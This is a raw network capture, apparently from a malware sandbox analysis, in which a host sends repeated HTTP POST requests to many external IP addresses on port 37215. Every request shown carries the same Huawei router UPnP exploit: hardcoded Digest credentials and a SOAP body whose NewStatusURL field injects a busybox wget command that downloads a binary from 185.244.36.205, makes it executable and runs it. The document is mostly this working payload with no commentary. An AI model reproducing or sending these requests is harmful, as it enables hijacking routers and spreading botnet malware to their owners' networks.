                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1458192.168.2.1549158138.19.115.10537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472196102 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1459192.168.2.1535986157.147.62.7837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472217083 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1460192.168.2.155544831.44.216.23237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472217083 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1461192.168.2.1548992190.115.101.4537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472219944 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1462192.168.2.1543636222.60.254.16737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472255945 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1463192.168.2.1553666157.215.33.9937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472255945 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1464192.168.2.155945041.196.96.7237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472269058 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1465192.168.2.156021245.37.68.23037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472286940 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1466192.168.2.1557130157.231.98.2537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472318888 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1467192.168.2.1558382102.140.245.10737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472338915 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
